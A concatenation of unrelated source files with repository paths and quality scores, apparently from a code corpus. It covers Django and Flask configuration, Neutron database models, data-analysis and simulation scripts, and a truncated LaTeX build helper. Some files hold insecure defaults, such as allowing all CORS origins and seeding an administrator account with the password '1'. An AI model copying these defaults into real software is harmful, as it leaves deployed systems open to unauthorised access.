ROOT_URLCONF = 'project.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages' ], }, }, ] WSGI_APPLICATION = 'project.wsgi.application' # Database # https://docs.djangoproject.com/en/3.1/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': os.environ.get('SQL_ENGINE', 'django.db.backends.sqlite3'), 'NAME': os.environ.get('SQL_DATABASE', os.path.join(BASE_DIR, 'db.sqlite3')), 'USER': os.environ.get('SQL_USER'), 'PASSWORD': os.environ.get('SQL_PASSWORD'), 'HOST': os.environ.get('SQL_HOST'), 'PORT': os.environ.get('SQL_PORT'), } } # Password validation # https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] AUTH_USER_MODEL = 'authentication.User' # Internationalization # https://docs.djangoproject.com/en/3.1/topics/i18n/ LANGUAGE_CODE = 'uk' LANGUAGES = [ ('en', _('English')), ('uk', _('Ukrainian')) ] LOCALE_PATHS = ( BASE_DIR / 'locale', ) TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/3.1/howto/static-files/ STATIC_URL = "/static/" STATIC_ROOT = os.path.join(BASE_DIR, "static") EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend' # ------------------------------------------ # # django-money # # ------------------------------------------ # DEFAULT_CURRENCY = 'EUR' EXCHANGE_BACKEND = 'djmoney.contrib.exchange.backends.FixerBackend' 
FIXER_ACCESS_KEY = '<KEY>' # ------------------------------------------ # # Celery # # ------------------------------------------ # CELERY_BROKER_URL = os.environ.get('REDIS_LOCATION', 'redis://127.0.0.1:6379') CELERY_RESULT_BACKEND = os.environ.get('REDIS_LOCATION', 'redis://127.0.0.1:6379') CELERY_ACCEPT_CONTENT = ['application/json'] CELERY_RESULT_SERIALIZER = 'json' CELERY_TASK_SERIALIZER = 'json' CELERY_BEAT_SCHEDULE = { 'update_rates': { 'task': 'apps.user.tasks.update_rates', 'schedule': crontab(hour="*/1"), } } # ------------------------------------------ # # Django REST Framework # # ------------------------------------------ # REST_FRAMEWORK = { 'DEFAULT_PERMISSION_CLASSES': ( 'rest_framework.permissions.IsAuthenticated', ), 'DEFAULT_AUTHENTICATION_CLASSES': ( 'rest_framework.authentication.BasicAuthentication', 'rest_framework_simplejwt.authentication.JWTAuthentication', ), 'EXCEPTION_HANDLER': 'apps.common.errors.custom_exception_handler', 'TEST_REQUEST_DEFAULT_FORMAT': 'json', } # ------------------------------------------ # # djoser # # ------------------------------------------ # DJOSER = { # Name of a field in User model to be used as login field 'LOGIN_FIELD': 'email', # If True user will be required to click activation # link sent in email after: # * creating an account # * updating their email 'SEND_ACTIVATION_EMAIL': True, 'ACTIVATION_URL': '/activate/{uid}/{token}', 'PASSWORD_RESET_CONFIRM_URL': 'password/reset/confirm/{uid}/{token}', 'USERNAME_RESET_CONFIRM_URL': 'email/reset/confirm/{uid}/{token}', # If True, you need to pass re_password to /users/ # endpoint, to validate password equality. 'USER_CREATE_PASSWORD_RETYPE': True, 'PASSWORD_RESET_CONFIRM_RETYPE': True, # If True, register or activation endpoint # will send confirmation email to user. 'SEND_CONFIRMATION_EMAIL': True, 'SERIALIZERS': { 'user_create': 'apps.user.serializers.UserCreateSerializer' } } # ------------------------------------------ # # Simple JWT # # ------------------------------------------ # SIMPLE_JWT = { 'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5), 'REFRESH_TOKEN_LIFETIME': timedelta(days=1), 'ROTATE_REFRESH_TOKENS': True, 'AUTH_HEADER_TYPES': ('JWT',), 'USER_ID_FIELD': 'id', 'USER_ID_CLAIM': 'id', } CORS_ALLOW_ALL_ORIGINS = True
1.976563
2
app/flaskApp/config.py
jeanmarc2019/PTHacks2019-Planning
0
1878
import configparser import os dir_path = os.path.dirname(os.path.realpath(__file__)) dir_path += '/cfg.ini' class Configuration(object): def __init__(self,debug=False): section = "Flask-debug" if debug else "Flask" cfg = configparser.ConfigParser() cfg.read(dir_path if debug else "/var/www/html/flaskApp/cfg.ini") self.debug = cfg.getboolean(section, "DEBUG") self.csrf_enabled = cfg.getboolean(section,"CSRF_ENABLED") self.threads_per_page = cfg.getint(section,"THREADS_PER_PAGE") self.port = cfg.getint(section,"PORT") self.host = cfg.get(section,"HOST")
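The Configuration class above reads a two-section INI file; the key names follow from the getters it calls, while the values below are only illustrative. A self-contained round-trip check of that assumed shape:

# Illustrative cfg.ini shape for the Configuration class above; the key
# names come from the getters, the values are invented for the example.
import configparser

SAMPLE = """
[Flask]
DEBUG = false
CSRF_ENABLED = true
THREADS_PER_PAGE = 2
PORT = 80
HOST = 0.0.0.0

[Flask-debug]
DEBUG = true
CSRF_ENABLED = true
THREADS_PER_PAGE = 2
PORT = 5000
HOST = 127.0.0.1
"""

cfg = configparser.ConfigParser()
cfg.read_string(SAMPLE)
assert cfg.getboolean('Flask-debug', 'DEBUG') is True
assert cfg.getint('Flask', 'PORT') == 80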
2.234375
2
neutron/db/models/l3ha.py
cleo4zheng/neutron
4
1879
<filename>neutron/db/models/l3ha.py # Copyright (C) 2014 eNov<NAME> <<EMAIL>> # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # from neutron_lib.db import model_base import sqlalchemy as sa from sqlalchemy import orm from neutron.common import constants as n_const from neutron.db.models import agent as agent_model from neutron.db import models_v2 class L3HARouterAgentPortBinding(model_base.BASEV2): """Represent agent binding state of a HA router port. A HA Router has one HA port per agent on which it is spawned. This binding table stores which port is used for a HA router by a L3 agent. """ __tablename__ = 'ha_router_agent_port_bindings' __table_args__ = ( sa.UniqueConstraint( 'router_id', 'l3_agent_id', name='uniq_ha_router_agent_port_bindings0port_id0l3_agent_id'), model_base.BASEV2.__table_args__ ) port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id', ondelete='CASCADE'), nullable=False, primary_key=True) port = orm.relationship(models_v2.Port) router_id = sa.Column(sa.String(36), sa.ForeignKey('routers.id', ondelete='CASCADE'), nullable=False) l3_agent_id = sa.Column(sa.String(36), sa.ForeignKey("agents.id", ondelete='CASCADE')) agent = orm.relationship(agent_model.Agent) state = sa.Column(sa.Enum(n_const.HA_ROUTER_STATE_ACTIVE, n_const.HA_ROUTER_STATE_STANDBY, name='l3_ha_states'), default=n_const.HA_ROUTER_STATE_STANDBY, server_default=n_const.HA_ROUTER_STATE_STANDBY) class L3HARouterNetwork(model_base.BASEV2, model_base.HasProjectPrimaryKey): """Host HA network for a tenant. One HA Network is used per tenant, all HA router ports are created on this network. """ __tablename__ = 'ha_router_networks' network_id = sa.Column(sa.String(36), sa.ForeignKey('networks.id', ondelete="CASCADE"), nullable=False, primary_key=True) network = orm.relationship(models_v2.Network) class L3HARouterVRIdAllocation(model_base.BASEV2): """VRID allocation per HA network. Keep a track of the VRID allocations per HA network. """ __tablename__ = 'ha_router_vrid_allocations' network_id = sa.Column(sa.String(36), sa.ForeignKey('networks.id', ondelete="CASCADE"), nullable=False, primary_key=True) vr_id = sa.Column(sa.Integer(), nullable=False, primary_key=True)
1.789063
2
authentication/migrate.py
anae09/electionWebService
0
1880
<reponame>anae09/electionWebService from flask import Flask from configuration import Configuration from flask_migrate import Migrate, init, migrate, upgrade from models import database, Role, UserRole, User from sqlalchemy_utils import database_exists, create_database application = Flask(__name__) application.config.from_object(Configuration) migrateObject = Migrate(application, database) done = False while not done: try: if not database_exists(application.config["SQLALCHEMY_DATABASE_URI"]): create_database(application.config["SQLALCHEMY_DATABASE_URI"]) database.init_app(application) with application.app_context() as context: init() migrate(message="Production migration") upgrade() adminRole = Role(name="administrator") userRole = Role(name="user") database.session.add(adminRole) database.session.add(userRole) database.session.commit() admin = User( jmbg="0000000000000", forename="admin", surname="admin", email="<EMAIL>", password="1" ) database.session.add(admin) database.session.commit() userRole = UserRole( userId=admin.id, roleId=adminRole.id ) database.session.add(userRole) database.session.commit() done = True except Exception as err: print(err)
2.078125
2
output/ensemble_analysis.py
gitter-lab/pria-ams-enamine
1
1881
<filename>output/ensemble_analysis.py from __future__ import print_function import os import json import numpy as np def extract(file_path): if not os.path.isfile(file_path): return -1, -1, -1 with open(file_path, 'r') as f: lines = f.readlines() test_roc, test_precision, test_NEF = -1, -1, -1 for line in lines: if 'test precision' in line: line = line.strip().split(':') test_precision = float(line[1]) if 'test roc' in line: line = line.strip().split(':') test_roc = float(line[1]) if 'ratio: 0.01, NEF:' in line: line = line.strip().replace('NEF:', '').split(',') test_NEF = float(line[1]) return test_roc, test_precision, test_NEF if __name__ == '__main__': model_list = [ 'random_forest_classification', 'xgboost_classification', 'xgboost_regression', 'single_deep_classification', 'single_deep_regression' ] model_process_num_list = { 'random_forest_classification': [139, 69, 111, 212, 210, 148, 28, 61, 124, 130, 131, 141, 14, 38, 165, 65, 123, 94, 3, 88, 72], 'xgboost_classification': [140, 967, 960, 807, 263, 694, 440, 47, 116, 792, 663, 32, 564, 950, 735, 84, 364, 605, 431, 55, 388], 'xgboost_regression': [187, 6, 514, 507, 880, 440, 605, 718, 754, 409, 586, 214, 753, 65, 294, 911, 721, 81, 321, 545, 280], 'single_deep_classification': [356, 404, 215, 93, 254, 88, 423, 47, 363, 132, 5, 385, 370, 29, 415, 54, 124, 183, 180, 416], 'single_deep_regression': [199, 323, 114, 123, 47, 175, 17, 178, 106, 265, 67, 157, 369, 115, 191, 20, 27, 108, 270, 45], 'ensemble': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12] } for model in model_list: print('Model: {}'.format(model)) number = len(model_process_num_list[model]) hyper_parameter_result_roc = [] hyper_parameter_result_precision = [] hyper_parameter_result_NEF = [] for running_process in model_process_num_list[model]: test_roc_list, test_precision_list, test_NEF_list = [], [], [] for idx in range(4): file_path = '{}/{}_{}_{}.out'.format(model, model, running_process, idx) test_roc, test_precision, test_NEF = extract(file_path) if test_roc == -1 and test_precision == -1: print('missing index: {}'.format(running_process)) if test_roc != -1: test_roc_list.append(test_roc) if test_precision != -1: test_precision_list.append(test_precision) if test_NEF != -1: test_NEF_list.append(test_NEF) hyper_parameter_result_roc.append(np.mean(test_roc_list)) hyper_parameter_result_precision.append(np.mean(test_precision_list)) hyper_parameter_result_NEF.append(np.mean(test_NEF_list)) for running_process, roc, pr, NEF in zip(model_process_num_list[model], hyper_parameter_result_roc, hyper_parameter_result_precision, hyper_parameter_result_NEF): print('{}\t{}\t{}\t{}'.format(running_process, roc, pr, NEF)) print() print('On The Last Folder') model_list = [ 'random_forest_classification', 'xgboost_classification', 'xgboost_regression', 'single_deep_classification', 'single_deep_regression', 'ensemble' ] for model in model_list: print('Model: {}'.format(model)) number = len(model_process_num_list[model]) for running_process in model_process_num_list[model]: if model == 'ensemble': file_path = '{}/{}.out'.format(model, running_process) else: file_path = '{}/{}_{}_4.out'.format(model, model, running_process) test_roc, test_precision, test_NEF = extract(file_path) print('{}\t{}'.format(running_process, test_NEF)) print()
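extract() above scrapes three metrics out of free-form .out logs via substring checks; a synthetic log in the shape those checks imply (file name and numbers invented here) shows the expected format and return order:

# Synthetic demonstration of extract(); the log content is invented but
# matches the substring patterns the parser looks for.
import os
import tempfile

log = "test roc: 0.84\ntest precision: 0.31\nratio: 0.01, NEF: 0.42\n"
fd, path = tempfile.mkstemp(suffix='.out')
with os.fdopen(fd, 'w') as f:
    f.write(log)
print(extract(path))  # -> (0.84, 0.31, 0.42), assuming extract() from above is in scope
os.remove(path)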
2.671875
3
openstack_dashboard/test/integration_tests/regions/messages.py
ankur-gupta91/block_storage
1
1882
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from selenium.common.exceptions import NoSuchElementException from selenium.webdriver.common import by from openstack_dashboard.test.integration_tests.regions import baseregion ERROR = 'alert-danger' INFO = 'alert-info' SUCCESS = 'alert-success' class MessageRegion(baseregion.BaseRegion): _close_locator = (by.By.CSS_SELECTOR, 'a.close') def _msg_locator(self, level): return (by.By.CSS_SELECTOR, 'div.alert.%s' % level) def __init__(self, driver, conf, level=SUCCESS): self._default_src_locator = self._msg_locator(level) # NOTE(tsufiev): we cannot use self._turn_off_implicit_wait() at this # point, because the instance is not initialized by ancestor's __init__ driver.implicitly_wait(0) try: super(MessageRegion, self).__init__(driver, conf) except NoSuchElementException: self.src_elem = None finally: self._turn_on_implicit_wait() def exists(self): return self._is_element_displayed(self.src_elem) def close(self): self._get_element(*self._close_locator).click()
1.9375
2
model_input.py
bgarbin/GUIDE
0
1883
<reponame>bgarbin/GUIDE # -*- coding: utf-8 -*- import numpy as np #import cmath as cm # Main parameters for window # 'nstep_record': number of time_steps between two consecutive record events window_params = {'kernel': 'RK4','nstep_update_plot': 100, 'step_size': 0.01, 'array_size': 10000, 'streaming': True, 'record_state':False, 'nstep_record':1, 'window_size':(1200,1000), 'invert_order_obs_var': True,'theme':'dark'} # Definition of the plot configuration def load_docks(): ''' Returns a dict to be used for plots declaration. Here, we use pyqtgraph docks. Each plot has a dictionary as "value" with keys: "type" (accepted values: 'plot' and 'image'), "zoomOf" (key name of another dock), "position" (accepted values: 'bottom', 'top', 'left', 'right', 'above', or 'below'), "relativeTo" (optional, key name of another dock; position relative to another dock), size [(xlength,ylength); note that lengths arguments are only a suggestion; docks will still have to fill the entire dock area and obey the limits of their internal widgets], "labels" (dict of position:str), "title" (str). ''' docks = { 'plot1' : {'type': 'plot1D' , 'position': 'left' , 'size': (500,500), 'labels':{'bottom':'Time (arb. units)','left':'Intensity (arb. units)'}}, 'phase_space' : {'type': 'plot2D', 'position': 'right', 'size': (300,300)}, 'plot2' : {'type': 'plot1D' , 'zoomOf': 'plot1' , 'position': 'bottom', 'relativeTo': 'phase_space', 'size': (300,100)}, 'plot3' : {'type': 'plot1D', 'position': 'top','relativeTo':'phase_space', 'size': (300,300)}, 'custom_name' : {'type': 'image', 'position': 'above','relativeTo':'plot3', 'size': (300,300)}, } return docks def load_variables(): ''' Returns a dict of the variables. Each variable is a dict with keys: "type" (e.g. np.float64, np.complex128), "init_cond" (type), "plot" (bool, optional default is True), "dock" (list of key name(s) of docks [str] as defined in the load_docks function; optional; if not provided, will be plotted on every plot), "equation" (callable, optional default is diff_eq_{variable_name}), "help" (str, to be displayed in help message). Additional keys are added internally: "value", "observable" (False), "lineedit", "checkbox". ''' variables = { 'A' : {'type': np.complex128, 'init_cond': 0., 'plot': False, 'dock':['plot1','plot2'], 'help':'field in the first cavity'}, 'B' : {'type': np.complex128, 'init_cond': 0.001, 'plot': False, 'equation': diff_eq_B} } return variables def load_observables(): ''' Returns a dict of the observables. Similar to variables, observables are added internally to the dictionary of variables. Each observable is a dict with keys: "type" (e.g. np.float64, np.complex128), "init_cond" (type), "plot" (bool, optional default is True), "dock" (list of key name(s) of docks [str] as defined in the load_docks function; optional; if not provided, will be plotted on every plot), "equation" (callable, optional default is eq_{variable_name}), "calculation_size" (bool, whether you want the corresponding variable to be only the size of what the calculation returns; WARNING: those items won't be stored), "help" (str, to be displayed in help message). Additional keys are added internally: "value", "observable" (True), "lineedit", "checkbox". 
''' observables = { 'mod_A' : {'type': np.float64, 'init_cond': 0., 'plot': True, 'dock':['plot1','plot2'], 'help':'modulus square of A'}, 'mod_B' : {'type': np.float64, 'init_cond': 0., 'dock':['plot1','plot2','plot3']}, 'mod_A_2' : {'type': np.float64, 'init_cond': 0., 'plot': True, 'dock':[{'phase_space':['mod_A_2','mod_B_2']}],'calculation_size':True, 'help':'abs(A)**2, shortened to be plotted in phase space'}, 'mod_B_2' : {'type': np.float64, 'init_cond': 0. ,'dock':[{'phase_space':['mod_B_2','mod_A_2']}],'calculation_size':True}, 'mod_A_2D' : {'type': np.float64, 'init_cond': 0. ,'dock':['custom_name'],'calculation_size':True,'help':'variable to be plotted in the image dock'}, #'ph_A' : {'type': np.float64, 'init_cond': 0., 'dock':['plot3']}, #'ph_B' : {'type': np.float64, 'init_cond': 0., 'dock':['plot3']} } return observables def load_params(): ''' Returns a dict of the parameters. Similarly to variables/observables, each parameter has a dictionary as "value" with keys: "init_cond" (float), "min" (float), "max" (float), step (float or int; WARNING if int this parameter will be an integer), "help" (str, to be displayed in help message). Additional keys are added internally: "value", "spinbox", "slider", "slider_conversion_factor". ''' params = {} params['delta'] = {'init_cond': -8., 'min': -10., 'max': 10., 'step': 0.01, 'help':'detuning parameter'} params['f'] = {'init_cond': 4.8, 'min': 0. , 'max': 20., 'step': 0.01} params['kappa'] = {'init_cond': 2.8, 'min': 0. , 'max': 10., 'step': 0.01} params['gamma'] = {'init_cond': 0. , 'min': -1. , 'max': 1., 'step': 0.01} params['tau'] = {'init_cond': 1. , 'min': 0. , 'max': 10., 'step': 0.01} params['npts_PS'] = {'init_cond': 1000 , 'min': 1 , 'max': 2000, 'step': 1} params['folding'] = {'init_cond': 100 , 'min': 1 , 'max': 1000, 'step': 1} params['min_scan'] = {'init_cond': 0, 'min': 0., 'max': 500., 'step': 0.01, 'help':'lower bound of the f scan'} params['max_scan'] = {'init_cond': 10, 'min': 0., 'max': 500., 'step': 0.01, 'help':'upper bound of the f scan'} params['step_scan'] = {'init_cond': 0.05, 'min': 0.001, 'max': 10., 'step': 0.001, 'help':'step of the f scan'} params['nstep_scan'] = {'init_cond': 50, 'min': 0, 'max': 500, 'step': 1, 'help':'simulator steps per scan point'} return params # BEGIN Declaration of the equations. Automatically recognized patterns are "diff_eq_{variable}" (variables) and "eq_{observable}" (observables); with a name after the pattern that must match the variable/observable's one. Alternatively, you may use custom equation names. You should declare it in the variable/observable dictionary with the keyword "equation". 
def diff_eq_A(ui,variables, params): return 1j*(params['delta']*params['tau'] + abs(variables['A'])**2)*variables['A'] - variables['A'] + (1j*params['kappa'] + params['gamma'])*params['tau']*variables['B'] + params['f'] def diff_eq_B(ui,variables, params): return 1j*(params['delta']*params['tau'] + abs(variables['B'])**2)*variables['B'] - variables['B'] + (1j*params['kappa'] + params['gamma'])*params['tau']*variables['A'] + params['f'] def eq_mod_A(ui,variables,params): return abs(variables['A'])**2 def eq_mod_B(ui,variables,params): return abs(variables['B'])**2 def eq_mod_A_2(ui,variables,params): return variables['mod_A'][-params['npts_PS']:] def eq_mod_B_2(ui,variables,params): return variables['mod_B'][-params['npts_PS']:] def eq_mod_A_2D(ui,variables,params): folding = params['folding'] nb_rt = int(len(variables['mod_A'])/params['folding']) return np.reshape(variables['mod_A'][-(folding*nb_rt):],(nb_rt,folding)) #def eq_ph_A(variables,params): #return [cm.phase(temp) for temp in variables['A']] #np.array(np.arctan2(np.imag(variables['A']), np.real(variables['A']))) #def eq_ph_B(variables,params): #return [cm.phase(temp) for temp in variables['B']] def keyboard_keys(): """ Returns a dictionary of user-defined keys of form key:callable. System reserved keys: [" ", "q", "h", "s", "r", "i", "c"]. This must return an empty dict if no extra keys. """ keys = { 't': ramp_f, } return keys #return {} def ramp_f(ui,variables,params): print('begin scanning') for f in np.concatenate((np.arange(params['min_scan'],params['max_scan']+params['step_scan'],params['step_scan']),np.arange(params['max_scan'],params['min_scan']-params['step_scan'],-params['step_scan']))): f = round(f,2) ui.set_param('f',f) ui.run_simulator(params['nstep_scan']) print('end scanning') def kernel_my_own(variables,params): ''' Takes as arguments dicts of variables and params as {'key':value}. Returns a dict of the results with the same form. For now the function name must start with "kernel_" ''' pass
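window_params selects an 'RK4' kernel, but the GUIDE framework's own stepper is not part of this file, so the following is only a sketch of how a fixed-step RK4 could drive diff_eq_A/diff_eq_B (parameter values copied from load_params; 'ui' is unused by these equations, so None is passed):

# Standalone RK4 sketch (an assumption about the solver, which is not in
# this file); integrates the two coupled fields defined above.
def rk4_step(state, params, h, ui=None):
    derivs = {'A': diff_eq_A, 'B': diff_eq_B}
    def f(s):
        return {k: eq(ui, s, params) for k, eq in derivs.items()}
    k1 = f(state)
    k2 = f({k: state[k] + 0.5 * h * k1[k] for k in state})
    k3 = f({k: state[k] + 0.5 * h * k2[k] for k in state})
    k4 = f({k: state[k] + h * k3[k] for k in state})
    return {k: state[k] + (h / 6.0) * (k1[k] + 2 * k2[k] + 2 * k3[k] + k4[k]) for k in state}

params_demo = {'delta': -8., 'tau': 1., 'kappa': 2.8, 'gamma': 0., 'f': 4.8}
state = {'A': 0j, 'B': 0.001 + 0j}
for _ in range(1000):
    state = rk4_step(state, params_demo, h=0.01)
print(abs(state['A'])**2, abs(state['B'])**2)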
2.484375
2
input/EnvEq/pairwise/Tneg-Tpro/u_lim_o2Tpro-u_lim_o2Tneg/parallelizer.py
Harshavardhan-BV/Cancer-compe-strat
1
1884
from multiprocessing import Pool import EnvEq as ee import numpy as np import itertools as it import os #parsing input into numpy arrays from input import * y0=np.array([y0_Tpos,y0_Tpro,y0_Tneg,y0_o2,y0_test]) p=np.array([p_o2,p_test]) mu=np.array([[mu_o2Tpos,mu_o2Tpro,mu_o2Tneg],[mu_testTpos,mu_testTpro,0]]) lam=np.array([lam_o2,lam_test]) t_D=np.array([t_DTpos,t_DTpro,t_DTneg]) r=np.array([r_Tpos,r_Tpro,r_Tneg]) delta=np.array([delta_Tpos,delta_Tpro,delta_Tneg]) rho=np.array([rho_Tpos,rho_Tpro,rho_Tneg]) lim=np.array([[[l_lim_o2Tpos,u_lim_o2Tpos],[l_lim_o2Tpro,u_lim_o2Tpro],[l_lim_o2Tneg,u_lim_o2Tneg]],[[l_lim_testTpos,u_lim_testTpos],[l_lim_testTpro,u_lim_testTpro],[0,0]]],dtype=np.float64) #make directories for saving raw_outputs try: os.makedirs("../../raw_output/EnvEq/"+f_name) except: pass #iterator over these o2_lim_arr=np.empty([0,2]) for ulim_Tpro in np.arange(0.1,1,0.2): for ulim_Tneg in np.arange(0.1,1,0.2): o2_lim_arr=np.append(o2_lim_arr,[[ulim_Tpro,ulim_Tneg]],axis=0) def solve_parm(u_lim_o2): #calls the solve_eq function with all default inputs other than o2_lim f_name_i=f_name+"{:.1f}".format(u_lim_o2[0])+"-"+"{:.1f}".format(u_lim_o2[1]) lim[0,1,1]=u_lim_o2[0] lim[0,2,1]=u_lim_o2[1] ee.solve_eq(t_max,dt,y0,p,mu,lam,r,K,delta,rho,lim,f_name_i) if __name__ == '__main__': pool = Pool(4) pool.map(solve_parm,o2_lim_arr) #iterate over the o2_lims pool.close() pool.join()
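A side note on the grid construction above: the file already imports itertools as it, and the nested loops are equivalent to a product over one range. A sketch of the same construction (identical pair ordering, since it.product iterates the second factor fastest):

# Equivalent construction of o2_lim_arr with the existing `it` alias;
# produces the same 25 (ulim_Tpro, ulim_Tneg) pairs as the loops above.
ulims = np.arange(0.1, 1, 0.2)
o2_lim_arr = np.array(list(it.product(ulims, ulims)))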
2.1875
2
task1_makeTrainingDataset.py
1985312383/contest
2
1885
<filename>task1_makeTrainingDataset.py import csv import re import numpy as np thre = 1.5 # tunable parameter: the outlier threshold iteration_num = 2 # tunable parameter: the number of cleaning iterations def KalmanFilter(z, n_iter=20): # Kalman filter # assumes the case A = 1, H = 1 # initial parameters sz = (n_iter,) # size of array # Q = 1e-5 # process variance Q = 1e-6 # process variance # allocate space for arrays xhat = np.zeros(sz) # a posteriori estimate of x P = np.zeros(sz) # a posteriori error estimate xhatminus = np.zeros(sz) # a priori estimate of x Pminus = np.zeros(sz) # a priori error estimate K = np.zeros(sz) # gain or blending factor R = 0.015 ** 2 # estimate of measurement variance, change to see effect # initial guesses xhat[0] = 0.0 P[0] = 1.0 A = 1 H = 1 for k in range(1, n_iter): # time update xhatminus[k] = A * xhat[k - 1] # X(k|k-1) = AX(k-1|k-1) + BU(k) + W(k), A=1, BU(k) = 0 Pminus[k] = A * P[k - 1] + Q # P(k|k-1) = AP(k-1|k-1)A' + Q(k), A=1 # measurement update K[k] = Pminus[k] / (Pminus[k] + R) # Kg(k)=P(k|k-1)H'/[HP(k|k-1)H' + R], H=1 xhat[k] = xhatminus[k] + K[k] * (z[k] - H * xhatminus[k]) # X(k|k) = X(k|k-1) + Kg(k)[Z(k) - HX(k|k-1)], H=1 P[k] = (1 - K[k] * H) * Pminus[k] # P(k|k) = (1 - Kg(k)H)P(k|k-1), H=1 return xhat def data_process(file_path: str): with open(file_path, "r") as f: # open the file f.readline() # skip the first line data = f.readlines() # read the remaining lines data_num = len(data) / 4 if int(data_num) - data_num < -0.1: raise ValueError("wrong number of data records!") initial_time = re.search(":.*:([0-9]*)", data[0], flags=0) # get the initial sequence number initial_time = int(initial_time.group(1)) Measures = [] for i in range(int(data_num)): measure = [] for j in range(4): device = [] anchor = re.search(":[0-9]*?:RR:0:([0-9]):[0-9]*?:([0-9]*?):[0-9]*?:([0-9]*)", data[4 * i + j], flags=0) device.extend([int(anchor.group(3)) - initial_time, anchor.group(1), anchor.group(2)]) # get the sequence number, device (anchor) ID, and measured value device = list(map(int, device)) measure.append(device) # one measure is the four readings taken by the four devices Measures.append(measure) Measures = np.array(Measures) # Measures is a 3-D array of all collected measurements normalized_device_data = [] normalized_device_data_x = [] device_data = [] device_data_x = [] for i in range(4): device_data.append(Measures[:, i, 2]) device_data_x.append(np.arange(len(Measures[:, i, 2]))) normalized_device_data.append(device_data[i] / np.max(Measures[:, i, 2])) # max normalization normalized_device_data_x = device_data_x normalized_device_data = np.array(normalized_device_data) normalized_device_data_x = np.array(normalized_device_data_x) device_data = np.array(device_data) device_data_x = np.array(device_data_x) processed_device_data = np.array(device_data).copy() device_mean = np.mean(device_data, axis=1) device_std = np.std(device_data, axis=1) low_thre = device_mean - device_std * thre # lower bound for outlier removal high_thre = device_mean + device_std * thre # upper bound for outlier removal for _ in range(iteration_num): for i in range(4): for j in range(len(device_data[i, :])): if device_data[i, j] < low_thre[i] or device_data[i, j] > high_thre[i]: processed_device_data[i, j] = device_mean[i] xhat = [] for i in range(4): # raw_data = device_data[i] raw_data = processed_device_data[i] xhat.append(KalmanFilter(raw_data, n_iter=len(raw_data))) xhat = np.array(xhat) xhat = np.around(xhat, 1) # round the four filtered series to one decimal place return device_data, xhat # device_data is the raw data; xhat is the data after outlier removal and Kalman filtering def save_data(file_path: str, Measures): with open(file_path, "w+", newline="") as datacsv: # dialect selects how the csv file is written, default is excel; delimiter="\t" would set the separator used when writing csvwriter = csv.writer(datacsv, dialect=("excel")) # write one row to the csv file, one list item per cell (use a loop to write multiple rows) csvwriter.writerow(["Number", "A0", "A1", "A2", "A3"]) 
csvwriter.writerows(np.column_stack((np.arange(Measures.shape[1]), Measures.T)), ) def collect_dataset(kind): for i in range(1, 325): file_path = f"./data/附件1:UWB数据集/{kind}数据/{i}.{kind}.txt" original_data, final_processed_data = data_process(file_path) save_data(f"cleaned_data/{kind}数据/{i}.{kind}.csv", final_processed_data) def collect_labels(): pass if __name__ == '__main__': collect_dataset("正常") collect_dataset("异常")
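A quick synthetic check of the KalmanFilter defined above (values invented); with its small R and Q the gain settles low, so the estimate smooths heavily and converges toward the true level:

# Synthetic smoke test for the KalmanFilter above: a constant level plus
# Gaussian noise should converge toward the true level (here 5.0).
import numpy as np

rng = np.random.default_rng(0)
z = 5.0 + 0.3 * rng.standard_normal(200)
xhat = KalmanFilter(z, n_iter=len(z))
print(xhat[-1])  # close to 5.0 once the gain has settled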
3.078125
3
checkmate/contrib/plugins/all/progpilot/setup.py
marcinguy/checkmate-ce
0
1886
<reponame>marcinguy/checkmate-ce<gh_stars>0 from .analyzer import ProgpilotAnalyzer from .issues_data import issues_data analyzers = { 'phpanalyzer' : { 'name' : 'phpanalyzer', 'title' : 'phpanalyzer', 'class' : ProgpilotAnalyzer, 'language' : 'all', 'issues_data' : issues_data, }, }
1.507813
2
genlist.py
truckli/technotes
0
1887
<reponame>truckli/technotes #!/usr/bin/env python import shutil, re, os, sys file_model = "Model.template" bookname = "TechNotes" file_bibtex = "thebib.bib" folder_target = "../pdf/" #if name is a chapter, return its sections def get_sections(name): if not os.path.isdir(name): return [] files = os.listdir(name) sections = [] for section in files: if re.match('.*\.tex$', section) and not re.match(".*lmz0610.*", section): sections.append(name + "/" + section) return sections def is_updated(pdffile, texfiles): def depend_modified(fname, ims): depend_mtime = os.path.getmtime(fname) if depend_mtime > ims: print pdffile, ' mtime: ',ims print fname, ' mtime: ', depend_mtime return True return False old_pdffile = folder_target + pdffile if not os.path.isfile(old_pdffile): return False pdf_mtime = os.path.getmtime(old_pdffile) #if depend_modified(sys.argv[0], pdf_mtime): #return False #if depend_modified(file_model, pdf_mtime): #return False for section in texfiles: if depend_modified(section, pdf_mtime): return False return True def remove_tmp(tmpname): if os.path.isfile(tmpname): os.remove(tmpname) def remove_latex_tmps(texname): remove_tmp(texname + ".pdf") remove_tmp(texname + ".tex") remove_tmp(texname + ".blg") remove_tmp(texname + ".bbl") remove_tmp(texname + ".out") remove_tmp(texname + ".toc") 